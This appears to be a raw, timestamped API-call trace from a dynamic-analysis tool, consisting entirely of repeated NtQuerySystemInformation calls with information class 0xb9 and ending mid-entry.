[0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x28, ResultLength=0x0) [0200.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x28, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdae0, Length=0x28, ResultLength=0x0) [0200.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x20, ResultLength=0x0) [0200.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x20, ResultLength=0x0) [0200.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x20, ResultLength=0x0) [0200.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x20, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x20, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x20, ResultLength=0x0) [0200.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x20, ResultLength=0x0) [0200.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbb0, Length=0x38, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x20, ResultLength=0x0) [0200.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x20, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x20, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x40, ResultLength=0x0) [0200.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 